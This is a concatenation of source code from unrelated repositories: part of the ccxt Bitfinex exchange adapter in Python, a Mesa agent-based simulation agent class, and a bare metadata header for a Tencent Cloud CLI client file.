equivalent) # these values below are deprecated, we should not hardcode fees and limits anymore # to be reimplemented with bitfinex funding fees from their API or web endpoints 'deposit': { 'BTC': 0.0004, 'IOTA': 0.5, 'ETH': 0.0027, 'BCH': 0.0001, 'LTC': 0.001, 'EOS': 0.24279, 'XMR': 0.04, 'SAN': 0.99269, 'DASH': 0.01, 'ETC': 0.01, 'XRP': 0.02, 'YYW': 16.915, 'NEO': 0, 'ZEC': 0.001, 'BTG': 0, 'OMG': 0.14026, 'DATA': 20.773, 'QASH': 1.9858, 'ETP': 0.01, 'QTUM': 0.01, 'EDO': 0.95001, 'AVT': 1.3045, 'USDT': 0, 'TRX': 28.184, 'ZRX': 1.9947, 'RCN': 10.793, 'TNB': 31.915, 'SNT': 14.976, 'RLC': 1.414, 'GNT': 5.8952, 'SPK': 10.893, 'REP': 0.041168, 'BAT': 6.1546, 'ELF': 1.8753, 'FUN': 32.336, 'SNG': 18.622, 'AID': 8.08, 'MNA': 16.617, 'NEC': 1.6504, 'XTZ': 0.2, }, 'withdraw': { 'BTC': 0.0004, 'IOTA': 0.5, 'ETH': 0.0027, 'BCH': 0.0001, 'LTC': 0.001, 'EOS': 0.24279, 'XMR': 0.04, 'SAN': 0.99269, 'DASH': 0.01, 'ETC': 0.01, 'XRP': 0.02, 'YYW': 16.915, 'NEO': 0, 'ZEC': 0.001, 'BTG': 0, 'OMG': 0.14026, 'DATA': 20.773, 'QASH': 1.9858, 'ETP': 0.01, 'QTUM': 0.01, 'EDO': 0.95001, 'AVT': 1.3045, 'USDT': 20, 'TRX': 28.184, 'ZRX': 1.9947, 'RCN': 10.793, 'TNB': 31.915, 'SNT': 14.976, 'RLC': 1.414, 'GNT': 5.8952, 'SPK': 10.893, 'REP': 0.041168, 'BAT': 6.1546, 'ELF': 1.8753, 'FUN': 32.336, 'SNG': 18.622, 'AID': 8.08, 'MNA': 16.617, 'NEC': 1.6504, 'XTZ': 0.2, }, }, }, # todo rewrite for https://api-pub.bitfinex.com//v2/conf/pub:map:tx:method 'commonCurrencies': { 'ABS': 'ABYSS', 'AIO': 'AION', 'ALG': 'ALGO', # https://github.com/ccxt/ccxt/issues/6034 'AMP': 'AMPL', 'ATM': 'ATMI', 'ATO': 'ATOM', # https://github.com/ccxt/ccxt/issues/5118 'BAB': 'BCH', 'CTX': 'CTXC', 'DAD': 'DADI', 'DAT': 'DATA', 'DSH': 'DASH', 'DRK': 'DRK', # https://github.com/ccxt/ccxt/issues/7399 # https://coinmarketcap.com/currencies/pnetwork/ # https://en.cryptonomist.ch/blog/eidoo/the-edo-to-pnt-upgrade-what-you-need-to-know-updated/ 'EDO': 'PNT', 'GSD': 'GUSD', 'HOT': 'Hydro Protocol', 'IOS': 'IOST', 'IOT': 'IOTA', 'IQX': 'IQ', 'MIT': 'MITH', 'MNA': 'MANA', 'NCA': 'NCASH', 'ORS': 'ORS Group', # conflict with Origin Sport #3230 'POY': 'POLY', 'QSH': 'QASH', 'QTM': 'QTUM', 'RBT': 'RBTC', 'SEE': 'SEER', 'SNG': 'SNGLS', 'SPK': 'SPANK', 'STJ': 'STORJ', 'TRI': 'TRIO', 'TSD': 'TUSD', 'YYW': 'YOYOW', 'UDC': 'USDC', 'UST': 'USDT', 'UTN': 'UTNP', 'VSY': 'VSYS', 'WAX': 'WAXP', 'XCH': 'XCHF', 'ZBT': 'ZB', }, 'exceptions': { 'exact': { 'temporarily_unavailable': ExchangeNotAvailable, # Sorry, the service is temporarily unavailable. See https://www.bitfinex.com/ for more info. 'Order could not be cancelled.': OrderNotFound, # non-existent order 'No such order found.': OrderNotFound, # ? 'Order price must be positive.': InvalidOrder, # on price <= 0 'Could not find a key matching the given X-BFX-APIKEY.': AuthenticationError, 'Key price should be a decimal number, e.g. "123.456"': InvalidOrder, # on isNaN(price) 'Key amount should be a decimal number, e.g. "123.456"': InvalidOrder, # on isNaN(amount) 'ERR_RATE_LIMIT': RateLimitExceeded, 'Ratelimit': RateLimitExceeded, 'Nonce is too small.': InvalidNonce, 'No summary found.': ExchangeError, # fetchTradingFees(summary) endpoint can give self vague error message 'Cannot evaluate your available balance, please try again': ExchangeNotAvailable, 'Unknown symbol': BadSymbol, }, 'broad': { 'Invalid X-BFX-SIGNATURE': AuthenticationError, 'This API key does not have permission': PermissionDenied, # authenticated but not authorized 'not enough exchange balance for ': InsufficientFunds, # when buying cost is greater than the available quote currency 'minimum size for ': InvalidOrder, # when amount below limits.amount.min 'Invalid order': InvalidOrder, # ? 'The available balance is only': InsufficientFunds, # {"status":"error","message":"Cannot withdraw 1.0027 ETH from your exchange wallet. The available balance is only 0.0 ETH. If you have limit orders, open positions, unused or active margin funding, self will decrease your available balance. To increase it, you can cancel limit orders or reduce/close your positions.","withdrawal_id":0,"fees":"0.0027"} }, }, 'precisionMode': SIGNIFICANT_DIGITS, 'options': { 'currencyNames': { 'AGI': 'agi', 'AID': 'aid', 'AIO': 'aio', 'ANT': 'ant', 'AVT': 'aventus', # #1811 'BAT': 'bat', # https://github.com/ccxt/ccxt/issues/5833 'BCH': 'bab', # undocumented # 'BCH': 'bcash', # undocumented 'BCI': 'bci', 'BFT': 'bft', 'BSV': 'bsv', 'BTC': 'bitcoin', 'BTG': 'bgold', 'CFI': 'cfi', 'COMP': 'comp', 'DAI': 'dai', 'DADI': 'dad', 'DASH': 'dash', 'DATA': 'datacoin', 'DTH': 'dth', 'EDO': 'eidoo', # #1811 'ELF': 'elf', 'EOS': 'eos', 'ETC': 'ethereumc', 'ETH': 'ethereum', 'ETP': 'metaverse', 'FUN': 'fun', 'GNT': 'golem', 'IOST': 'ios', 'IOTA': 'iota', # https://github.com/ccxt/ccxt/issues/5833 'LEO': 'let', # ETH chain # 'LEO': 'les', # EOS chain 'LINK': 'link', 'LRC': 'lrc', 'LTC': 'litecoin', 'LYM': 'lym', 'MANA': 'mna', 'MIT': 'mit', 'MKR': 'mkr', 'MTN': 'mtn', 'NEO': 'neo', 'ODE': 'ode', 'OMG': 'omisego', 'OMNI': 'mastercoin', 'QASH': 'qash', 'QTUM': 'qtum', # #1811 'RCN': 'rcn', 'RDN': 'rdn', 'REP': 'rep', 'REQ': 'req', 'RLC': 'rlc', 'SAN': 'santiment', 'SNGLS': 'sng', 'SNT': 'status', 'SPANK': 'spk', 'STORJ': 'stj', 'TNB': 'tnb', 'TRX': 'trx', 'TUSD': 'tsd', 'USD': 'wire', 'USDC': 'udc', # https://github.com/ccxt/ccxt/issues/5833 'UTK': 'utk', 'USDT': 'tetheruso', # Tether on Omni # 'USDT': 'tetheruse', # Tether on ERC20 # 'USDT': 'tetherusl', # Tether on Liquid # 'USDT': 'tetherusx', # Tether on Tron # 'USDT': 'tetheruss', # Tether on EOS 'VEE': 'vee', 'WAX': 'wax', 'XLM': 'xlm', 'XMR': 'monero', 'XRP': 'ripple', 'XVG': 'xvg', 'YOYOW': 'yoyow', 'ZEC': 'zcash', 'ZRX': 'zrx', 'XTZ': 'xtz', }, 'orderTypes': { 'limit': 'exchange limit', 'market': 'exchange market', }, }, }) def fetch_funding_fees(self, params={}): self.load_markets() response = self.privatePostAccountFees(params) fees = response['withdraw'] withdraw = {} ids = list(fees.keys()) for i in range(0, len(ids)): id = ids[i] code = self.safe_currency_code(id) withdraw[code] = self.safe_float(fees, id) return { 'info': response, 'withdraw': withdraw, 'deposit': withdraw, # only for deposits of less than $1000 } def fetch_trading_fees(self, params={}): self.load_markets() response = self.privatePostSummary(params) # # { # time: '2019-02-20T15:50:19.152000Z', # trade_vol_30d: [ # { # curr: 'Total(USD)', # vol: 0, # vol_maker: 0, # vol_BFX: 0, # vol_BFX_maker: 0, # vol_ETHFX: 0, # vol_ETHFX_maker: 0 # } # ], # fees_funding_30d: {}, # fees_funding_total_30d: 0, # fees_trading_30d: {}, # fees_trading_total_30d: 0, # maker_fee: 0.001, # taker_fee: 0.002 # } # return { 'info': response, 'maker': self.safe_float(response, 'maker_fee'), 'taker': self.safe_float(response, 'taker_fee'), } def fetch_markets(self, params={}): ids = self.publicGetSymbols() details = self.publicGetSymbolsDetails() result = [] for i in range(0, len(details)): market = details[i] id = self.safe_string(market, 'pair') if not self.in_array(id, ids): continue id = id.upper() baseId = None quoteId = None if id.find(':') >= 0: parts = id.split(':') baseId = parts[0] quoteId = parts[1] else: baseId = id[0:3] quoteId = id[3:6] base = self.safe_currency_code(baseId) quote = self.safe_currency_code(quoteId) symbol = base + '/' + quote precision = { 'price': self.safe_integer(market, 'price_precision'), # https://docs.bitfinex.com/docs/introduction#amount-precision # The amount field allows up to 8 decimals. # Anything exceeding self will be rounded to the 8th decimal. 'amount': 8, } limits = { 'amount': { 'min': self.safe_float(market, 'minimum_order_size'), 'max': self.safe_float(market, 'maximum_order_size'), }, 'price': { 'min': math.pow(10, -precision['price']), 'max': math.pow(10, precision['price']), }, } limits['cost'] = { 'min': limits['amount']['min'] * limits['price']['min'], 'max': None, } result.append({ 'id': id, 'symbol': symbol, 'base': base, 'quote': quote, 'baseId': baseId, 'quoteId': quoteId, 'active': True, 'precision': precision, 'limits': limits, 'info': market, }) return result def amount_to_precision(self, symbol, amount): # https://docs.bitfinex.com/docs/introduction#amount-precision # The amount field allows up to 8 decimals. # Anything exceeding self will be rounded to the 8th decimal. return self.decimal_to_precision(amount, TRUNCATE, self.markets[symbol]['precision']['amount'], DECIMAL_PLACES) def price_to_precision(self, symbol, price): price = self.decimal_to_precision(price, ROUND, self.markets[symbol]['precision']['price'], self.precisionMode) # https://docs.bitfinex.com/docs/introduction#price-precision # The precision level of all trading prices is based on significant figures. # All pairs on Bitfinex use up to 5 significant digits and up to 8 decimals(e.g. 1.2345, 123.45, 1234.5, 0.00012345). # Prices submit with a precision larger than 5 will be cut by the API. return self.decimal_to_precision(price, TRUNCATE, 8, DECIMAL_PLACES) def calculate_fee(self, symbol, type, side, amount, price, takerOrMaker='taker', params={}): market = self.markets[symbol] rate = market[takerOrMaker] cost = amount * rate key = 'quote' if side == 'sell': cost *= price else: key = 'base' code = market[key] currency = self.safe_value(self.currencies, code) if currency is not None: precision = self.safe_integer(currency, 'precision') if precision is not None: cost = float(self.currency_to_precision(code, cost)) return { 'type': takerOrMaker, 'currency': market[key], 'rate': rate, 'cost': cost, } def fetch_balance(self, params={}): self.load_markets() types = { 'exchange': 'exchange', 'deposit': 'funding', 'trading': 'margin', } balanceType = self.safe_string(params, 'type', 'exchange') query = self.omit(params, 'type') response = self.privatePostBalances(query) # [{type: 'deposit', # currency: 'btc', # amount: '0.00116721', # available: '0.00116721'}, # {type: 'exchange', # currency: 'ust', # amount: '0.0000002', # available: '0.0000002'}, # {type: 'trading', # currency: 'btc', # amount: '0.0005', # available: '0.0005'}], result = {'info': response} for i in range(0, len(response)): balance = response[i] type = self.safe_string(balance, 'type') parsedType = self.safe_string(types, type) if (parsedType == balanceType) or (type == balanceType): currencyId = self.safe_string(balance, 'currency') code = self.safe_currency_code(currencyId) # bitfinex had BCH previously, now it's BAB, but the old # BCH symbol is kept for backward-compatibility # we need a workaround here so that the old BCH balance # would not override the new BAB balance(BAB is unified to BCH) # https://github.com/ccxt/ccxt/issues/4989 if not (code in result): account = self.account() account['free'] = self.safe_float(balance, 'available') account['total'] = self.safe_float(balance, 'amount') result[code] = account return self.parse_balance(result) def fetch_order_book(self, symbol, limit=None, params={}): self.load_markets() request = { 'symbol': self.market_id(symbol), } if limit is not None: request['limit_bids'] = limit request['limit_asks'] = limit response = self.publicGetBookSymbol(self.extend(request, params)) return self.parse_order_book(response, None, 'bids', 'asks', 'price', 'amount') def fetch_tickers(self, symbols=None, params={}): self.load_markets() response = self.publicGetTickers(params) result = {} for i in range(0, len(response)): ticker = self.parse_ticker(response[i]) symbol = ticker['symbol'] result[symbol] = ticker return self.filter_by_array(result, 'symbol', symbols) def fetch_ticker(self, symbol, params={}): self.load_markets() market = self.market(symbol) request = { 'symbol': market['id'], } ticker = self.publicGetPubtickerSymbol(self.extend(request, params)) return self.parse_ticker(ticker, market) def parse_ticker(self, ticker, market=None): timestamp = self.safe_float(ticker, 'timestamp') if timestamp is not None: timestamp *= 1000 timestamp = int(timestamp) symbol = None if market is not None: symbol = market['symbol'] elif 'pair' in ticker: marketId = self.safe_string(ticker, 'pair') if marketId is not None: if marketId in self.markets_by_id: market = self.markets_by_id[marketId] symbol = market['symbol'] else: baseId = marketId[0:3] quoteId = marketId[3:6] base = self.safe_currency_code(baseId) quote = self.safe_currency_code(quoteId) symbol = base + '/' + quote last = self.safe_float(ticker, 'last_price') return { 'symbol': symbol, 'timestamp': timestamp, 'datetime': self.iso8601(timestamp), 'high': self.safe_float(ticker, 'high'), 'low': self.safe_float(ticker, 'low'), 'bid': self.safe_float(ticker, 'bid'), 'bidVolume': None, 'ask': self.safe_float(ticker, 'ask'), 'askVolume': None, 'vwap': None, 'open': None, 'close': last, 'last': last, 'previousClose': None, 'change': None, 'percentage': None, 'average': self.safe_float(ticker, 'mid'), 'baseVolume': self.safe_float(ticker, 'volume'), 'quoteVolume': None, 'info': ticker, } def parse_trade(self, trade, market): id = self.safe_string(trade, 'tid') timestamp = self.safe_float(trade, 'timestamp') if timestamp is not None: timestamp = int(timestamp) * 1000 type = None side = self.safe_string_lower(trade, 'type') orderId = self.safe_string(trade, 'order_id') price = self.safe_float(trade, 'price') amount = self.safe_float(trade, 'amount') cost = None if price is not None: if amount is not None: cost = price * amount fee = None if 'fee_amount' in trade: feeCost = -self.safe_float(trade, 'fee_amount') feeCurrencyId = self.safe_string(trade, 'fee_currency') feeCurrencyCode = self.safe_currency_code(feeCurrencyId) fee = { 'cost': feeCost, 'currency': feeCurrencyCode, } return { 'id': id, 'info': trade, 'timestamp': timestamp, 'datetime': self.iso8601(timestamp), 'symbol': market['symbol'], 'type': type, 'order': orderId, 'side': side, 'takerOrMaker': None, 'price': price, 'amount': amount, 'cost': cost, 'fee': fee, } def fetch_trades(self, symbol, since=None, limit=50, params={}): self.load_markets() market = self.market(symbol) request = { 'symbol': market['id'], 'limit_trades': limit, } if since is not None: request['timestamp'] = int(since / 1000) response = self.publicGetTradesSymbol(self.extend(request, params)) return self.parse_trades(response, market, since, limit) def fetch_my_trades(self, symbol=None, since=None, limit=None, params={}): if symbol is None: raise ArgumentsRequired(self.id + ' fetchMyTrades() requires a `symbol` argument') self.load_markets() market = self.market(symbol) request = { 'symbol': market['id'], } if limit is not None: request['limit_trades'] = limit if since is not None: request['timestamp'] = int(since / 1000) response = self.privatePostMytrades(self.extend(request, params)) return self.parse_trades(response, market, since, limit) def create_order(self, symbol, type, side, amount, price=None, params={}): self.load_markets() request = { 'symbol': self.market_id(symbol), 'side': side, 'amount': self.amount_to_precision(symbol, amount), 'type': self.safe_string(self.options['orderTypes'], type, type), 'ocoorder': False, 'buy_price_oco': 0, 'sell_price_oco': 0, } if type == 'market': request['price'] = str(self.nonce()) else: request['price'] = self.price_to_precision(symbol, price) response = self.privatePostOrderNew(self.extend(request, params)) return self.parse_order(response) def edit_order(self, id, symbol, type, side, amount=None, price=None, params={}): self.load_markets() order = { 'order_id': int(id), } if price is not None: order['price'] = self.price_to_precision(symbol, price) if amount is not None: order['amount'] = self.number_to_string(amount) if symbol is not None: order['symbol'] = self.market_id(symbol) if side is not None: order['side'] = side if type is not None: order['type'] = self.safe_string(self.options['orderTypes'], type, type) response = self.privatePostOrderCancelReplace(self.extend(order, params)) return self.parse_order(response) def cancel_order(self, id, symbol=None, params={}): self.load_markets() request = { 'order_id': int(id), } return self.privatePostOrderCancel(self.extend(request, params)) def cancel_all_orders(self, symbol=None, params={}): return self.privatePostOrderCancelAll(params) def parse_order(self, order, market=None): side = self.safe_string(order, 'side') open = self.safe_value(order, 'is_live') canceled = self.safe_value(order, 'is_cancelled') status = None if open: status = 'open' elif canceled: status = 'canceled' else: status = 'closed' symbol = None if market is None: marketId = self.safe_string_upper(order, 'symbol') if marketId is not None: if marketId in self.markets_by_id: market = self.markets_by_id[marketId] if market is not None: symbol = market['symbol'] orderType = order['type'] exchange = orderType.find('exchange ') >= 0 if exchange: parts = order['type'].split(' ') orderType = parts[1] timestamp = self.safe_float(order, 'timestamp') if timestamp is not None: timestamp = int(timestamp) * 1000 id = self.safe_string(order, 'id') return { 'info': order, 'id': id, 'clientOrderId': None, 'timestamp': timestamp, 'datetime': self.iso8601(timestamp), 'lastTradeTimestamp': None, 'symbol': symbol, 'type': orderType, 'timeInForce': None, 'postOnly': None, 'side': side, 'price': self.safe_float(order, 'price'), 'stopPrice': None, 'average': self.safe_float(order, 'avg_execution_price'), 'amount': self.safe_float(order, 'original_amount'), 'remaining': self.safe_float(order, 'remaining_amount'), 'filled': self.safe_float(order, 'executed_amount'), 'status': status, 'fee': None, 'cost': None, 'trades': None, } def fetch_open_orders(self, symbol=None, since=None, limit=None, params={}): self.load_markets() if symbol is not None: if not (symbol in self.markets): raise ExchangeError(self.id + ' has no symbol ' + symbol) response = self.privatePostOrders(params) orders = self.parse_orders(response, None, since, limit) if symbol is not None: orders = self.filter_by(orders, 'symbol', symbol) return orders def fetch_closed_orders(self, symbol=None, since=None, limit=None, params={}): self.load_markets() request = {} if limit is not None: request['limit'] = limit response = self.privatePostOrdersHist(self.extend(request, params)) orders = self.parse_orders(response, None, since, limit) if symbol is not None: orders = self.filter_by(orders, 'symbol', symbol) orders = self.filter_by_array(orders, 'status', ['closed', 'canceled'], False) return orders def fetch_order(self, id, symbol=None, params={}): self.load_markets() request = { 'order_id': int(id), } response = self.privatePostOrderStatus(self.extend(request, params)) return self.parse_order(response) def parse_ohlcv(self, ohlcv, market=None): # # [ # 1457539800000, # 0.02594, # 0.02594, # 0.02594, # 0.02594, # 0.1 # ] # return [ self.safe_integer(ohlcv, 0), self.safe_float(ohlcv, 1), self.safe_float(ohlcv, 3), self.safe_float(ohlcv, 4), self.safe_float(ohlcv, 2), self.safe_float(ohlcv, 5), ] def fetch_ohlcv(self, symbol, timeframe='1m', since=None, limit=None, params={}): self.load_markets() if limit is None: limit = 100 market = self.market(symbol) v2id = 't' + market['id'] request = { 'symbol': v2id, 'timeframe': self.timeframes[timeframe], 'sort': 1, 'limit': limit, } if since is not None: request['start'] = since response = self.v2GetCandlesTradeTimeframeSymbolHist(self.extend(request, params)) # # [ # [1457539800000,0.02594,0.02594,0.02594,0.02594,0.1], # [1457547300000,0.02577,0.02577,0.02577,0.02577,0.01], # [1457550240000,0.0255,0.0253,0.0255,0.0252,3.2640000000000002], # ] # return self.parse_ohlcvs(response, market, timeframe, since, limit) def get_currency_name(self, code): # todo rewrite for https://api-pub.bitfinex.com//v2/conf/pub:map:tx:method if code in self.options['currencyNames']: return self.options['currencyNames'][code] raise NotSupported(self.id + ' ' + code + ' not supported for withdrawal') def create_deposit_address(self, code, params={}): self.load_markets() request = { 'renew': 1, } response = self.fetch_deposit_address(code, self.extend(request, params)) return response def fetch_deposit_address(self, code, params={}): self.load_markets() # todo rewrite for https://api-pub.bitfinex.com//v2/conf/pub:map:tx:method name = self.get_currency_name(code) request = { 'method': name, 'wallet_name': 'exchange', 'renew': 0, # a value of 1 will generate a new address } response = self.privatePostDepositNew(self.extend(request, params)) address = self.safe_value(response, 'address') tag = None if 'address_pool' in response: tag = address address = response['address_pool'] self.check_address(address) return { 'currency': code, 'address': address, 'tag': tag, 'info': response, } def fetch_transactions(self, code=None, since=None, limit=None, params={}): self.load_markets() currencyId = self.safe_string(params, 'currency') query = self.omit(params, 'currency') currency = None if currencyId is None: if code is None: raise ArgumentsRequired(self.id + ' fetchTransactions() requires a currency `code` argument or a `currency` parameter') else: currency = self.currency(code) currencyId = currency['id'] query['currency'] = currencyId if since is not None: query['since'] = int(since / 1000) response = self.privatePostHistoryMovements(self.extend(query, params)) # # [ # { # "id":581183, # "txid": 123456, # "currency":"BTC", # "method":"BITCOIN", # "type":"WITHDRAWAL", # "amount":".01", # "description":"3QXYWgRGX2BPYBpUDBssGbeWEa5zq6snBZ, offchain transfer ", # "address":"3QXYWgRGX2BPYBpUDBssGbeWEa5zq6snBZ", # "status":"COMPLETED", # "timestamp":"1443833327.0", # "timestamp_created": "1443833327.1", # "fee": 0.1, # } # ] # return self.parse_transactions(response, currency, since, limit) def parse_transaction(self, transaction, currency=None): # # crypto # # { # "id": 12042490, # "fee": "-0.02", # "txid": "EA5B5A66000B66855865EFF2494D7C8D1921FCBE996482157EBD749F2C85E13D", # "type": "DEPOSIT", # "amount": "2099.849999", # "method": "RIPPLE", # "status": "COMPLETED", # "address": "2505189261", # "currency": "XRP", # "timestamp": "1551730524.0", # "description": "EA5B5A66000B66855865EFF2494D7C8D1921FCBE996482157EBD749F2C85E13D", # "timestamp_created": "1551730523.0" # } # # fiat # # { # "id": 12725095, # "fee": "-60.0", # "txid": null, # "type": "WITHDRAWAL", # "amount": "9943.0", # "method": "WIRE", # "status": "SENDING", # "address": null, # "currency": "EUR", # "timestamp": "1561802484.0", # "description": "Name: bob, AccountAddress: some address, Account: someaccountno, Bank: bank address, SWIFT: foo, Country: UK, Details of Payment: withdrawal name, Intermediary Bank Name: , Intermediary Bank Address: , Intermediary Bank City: , Intermediary Bank Country: , Intermediary Bank Account: , Intermediary Bank SWIFT: , Fee: -60.0", # "timestamp_created": "1561716066.0" # } # timestamp = self.safe_float(transaction, 'timestamp_created') if timestamp is not None: timestamp = int(timestamp * 1000) updated = self.safe_float(transaction, 'timestamp') if updated is not None: updated = int(updated * 1000) currencyId = self.safe_string(transaction, 'currency') code = self.safe_currency_code(currencyId, currency) type = self.safe_string_lower(transaction, 'type') # DEPOSIT or WITHDRAWAL status = self.parse_transaction_status(self.safe_string(transaction, 'status')) feeCost = self.safe_float(transaction, 'fee') if feeCost is not None: feeCost = abs(feeCost) return { 'info': transaction, 'id': self.safe_string(transaction, 'id'), 'txid': self.safe_string(transaction, 'txid'), 'timestamp': timestamp, 'datetime': self.iso8601(timestamp), 'address': self.safe_string(transaction, 'address'), # todo: self is actually the tag for XRP transfers(the address is missing) 'tag': None, # refix it properly for the tag from description 'type': type, 'amount': self.safe_float(transaction, 'amount'), 'currency': code, 'status': status, 'updated': updated, 'fee': { 'currency': code, 'cost': feeCost, 'rate': None, }, } def parse_transaction_status(self, status): statuses = { 'SENDING': 'pending', 'CANCELED': 'canceled', 'ZEROCONFIRMED': 'failed', # ZEROCONFIRMED happens e.g. in a double spend attempt(I had one in my movementsnot ) 'COMPLETED': 'ok', } return self.safe_string(statuses, status, status) def withdraw(self, code, amount, address, tag=None, params={}): self.check_address(address) self.load_markets() # todo rewrite for https://api-pub.bitfinex.com//v2/conf/pub:map:tx:method name = self.get_currency_name(code) request = { 'withdraw_type': name, 'walletselected': 'exchange', 'amount': self.number_to_string(amount), 'address': address, } if tag is not None: request['payment_id'] = tag responses = self.privatePostWithdraw(self.extend(request, params)) response = responses[0] id = self.safe_string(response, 'withdrawal_id') message = self.safe_string(response, 'message') errorMessage = self.find_broadly_matched_key(self.exceptions['broad'], message) if id == 0: if errorMessage is not None: ExceptionClass = self.exceptions['broad'][errorMessage] raise ExceptionClass(self.id + ' ' + message) raise ExchangeError(self.id + ' withdraw returned an id of zero: ' + self.json(response)) return { 'info': response, 'id': id, } def fetch_positions(self, symbols=None, since=None, limit=None, params={}): self.load_markets() response = self.privatePostPositions(params) # # [ # { # "id":943715, # "symbol":"btcusd", # "status":"ACTIVE", # "base":"246.94", # "amount":"1.0", # "timestamp":"1444141857.0", # "swap":"0.0", # "pl":"-2.22042" # } # ] # # todo unify parsePosition/parsePositions return response def nonce(self): return self.milliseconds() def sign(self, path, api='public', method='GET', params={}, headers=None, body=None): request = '/' + self.implode_params(path, params) if api == 'v2': request = '/' + api + request else: request = '/' + self.version + request query = self.omit(params, self.extract_params(path)) url = self.urls['api'][api] + request if (api == 'public') or (path.find('/hist') >= 0): if query: suffix = '?' + self.urlencode(query) url += suffix request += suffix if api == 'private': self.check_required_credentials() nonce = self.nonce() query = self.extend({ 'nonce': str(nonce), 'request': request, }, query) body = self.json(query) payload = self.string_to_base64(body) secret = self.encode(self.secret) signature = self.hmac(payload, secret, hashlib.sha384) headers = { 'X-BFX-APIKEY': self.apiKey, 'X-BFX-PAYLOAD': self.decode(payload), 'X-BFX-SIGNATURE': signature, 'Content-Type': 'application/json', } return {'url': url, 'method': method, 'body': body, 'headers': headers} def handle_errors(self, code, reason, url, method, headers, body, response, requestHeaders, requestBody): if response is None: return if code >= 400: if body[0] == '{': feedback = self.id + ' ' + body message = self.safe_string_2(response, 'message', 'error') self.throw_exactly_matched_exception(self.exceptions['exact'], message, feedback) self.throw_broadly_matched_exception(self.exceptions['broad'], message, feedback) raise ExchangeError(feedback) # unknown message
40.401496
426
0.456968
88566ac20266e896964e385e3e424097743bffdd
4,933
py
Python
abm/dda-mesa/dda-mesa/agent.py
nickmalleson/surf
d6b8abb75635ac0fbadb445e67fc50ccb8b19945
[ "MIT" ]
3
2018-09-15T03:16:33.000Z
2020-07-11T00:50:39.000Z
abm/dda-mesa/dda-mesa/agent.py
nickmalleson/surf
d6b8abb75635ac0fbadb445e67fc50ccb8b19945
[ "MIT" ]
null
null
null
abm/dda-mesa/dda-mesa/agent.py
nickmalleson/surf
d6b8abb75635ac0fbadb445e67fc50ccb8b19945
[ "MIT" ]
10
2016-08-25T13:38:57.000Z
2021-02-01T10:20:01.000Z
from mesa import Agent import random class DDAAgent(Agent): """Default DDA agent""" def __init__(self, unique_id, model): """Initialise an agent with a unique_id and a reference to the model""" super().__init__(unique_id, model) # Agents need a state - this will be set by the model when the agent is created self.state = None # Each should have a colour for display (doesn't affect the analysis) self.colour = random.choice(["red", "blue", "green", "yellow", "orange", "pink", "green", "purple"]) #print("\tCreated agent {}".format(unique_id)) def step(self): """Step the agent""" # Note: to get the other agents # print(self.unique_id," have found the agents:",self.model.schedule.agents) # Randomly move cell. This is to demo how to do it the 'proper way' (computationally expensive # and unnecessary in this simple model # self.model.grid.move_agent(self, DDAAgent._get_rand_neighbour_cell(self)) if self.state == AgentStates.RETIRED: # Don't do anything if the agent is retired. return x, y = self.pos # The agent's position # If the agent has reached their destination then they can retire to the graveyard if self.state == AgentStates.TRAVELLING_FROM_A and self.pos == self.model.loc_b: self.model.increment_camera_b() # will pass camera b on their way out self.retire() return elif self.state == AgentStates.TRAVELLING_FROM_B and self.pos == self.model.loc_a: self.model.increment_camera_a() # They will pass camera A on their way out self.retire() return # See if they should leave through the midpoint if self.pos == self.model.loc_mid: #print(random.random()) #print(self.model.bleedout_rate) if random.random() > self.model.bleedout_rate: self.model.increment_camera_m() # Tell the midpoint camera that they're leaving self.retire() return # Otherwise move if self.state == AgentStates.TRAVELLING_FROM_A: self.model.grid.move_agent(self, ((x + 1), 0)) # Move 1 to right (away from point A) elif self.state == AgentStates.TRAVELLING_FROM_B: self.model.grid.move_agent(self, ((x - 1), 0)) # Move 1 to left (away from point A) # XXXX WHAT ABOUT LEAVING FROM THE GRAVEYARD # # Randomly move # if x == 0: # If far left, move right (or not) # self.model.grid.move_agent(self, random.choice([ (x,0), (1,0) ] ) ) # elif x == self.model._width-1: # If far right, move left (or not) # self.model.grid.move_agent(self, random.choice([(x, 0), (self.model._width-2, 0)])) # else: # Otherwise chose to move left or right, or not # self.model.grid.move_agent(self, random.choice([(x, 0), (x-1, 0), (x+1,0) ])) def activate(self): """Take this agent from a RETIRED state into an ACTIVE state (i.e. moving in the street)""" # Choose a location (either endpoint A or B) and move the agent there x = random.choice([self.model.loc_a, self.model.loc_b]) self.model.grid.move_agent(self, x) # Change their state and tell the relevant model camera that they are passing it if x == self.model.loc_a: self.state = AgentStates.TRAVELLING_FROM_A self.model.increment_camera_a() else: self.state = AgentStates.TRAVELLING_FROM_B self.model.increment_camera_b() def retire(self): """Make this agent RETIRE""" self.model.grid.move_agent(self, self.model.graveyard) self.state = AgentStates.RETIRED def __repr__(self): return "DDAAgent {} (state {})".format(self.unique_id, self.state) # Other useful functions, for reference more than anything else @classmethod def _get_rand_neighbour_cell(cls, agent): """Get a neighbouring cell at random. Don't use this, it's very expensive. Included here for reference (it's the 'proper' mesa way of doing it""" x, y = agent.pos # (pos is updated by grid.place_agent method when they are initialised in Model) possible_steps = agent.model.grid.get_neighborhood( agent.pos, moore=True, include_center=True) return random.choice(possible_steps) def _agents_with_me(self): """Get the agents on the same cell as me (as a list)""" self.model.grid.get_cell_list_contents([self.pos]) def _agents_near_me(self): """Get agents near me (as a list)""" self.model.grid.get_neighbors(self.pos, moore=True, include_center=False, radius=1) class AgentStates: RETIRED, TRAVELLING_FROM_A, TRAVELLING_FROM_B = range(3)
41.805085
108
0.62538
5da9fa0411f97f9e5a4e175a9c22d85cf83c4088
6,030
py
Python
tccli/services/habo/habo_client.py
zqfan/tencentcloud-cli
b6ad9fced2a2b340087e4e5522121d405f68b615
[ "Apache-2.0" ]
null
null
null
tccli/services/habo/habo_client.py
zqfan/tencentcloud-cli
b6ad9fced2a2b340087e4e5522121d405f68b615
[ "Apache-2.0" ]
null
null
null
tccli/services/habo/habo_client.py
zqfan/tencentcloud-cli
b6ad9fced2a2b340087e4e5522121d405f68b615
[ "Apache-2.0" ]
null
null
null
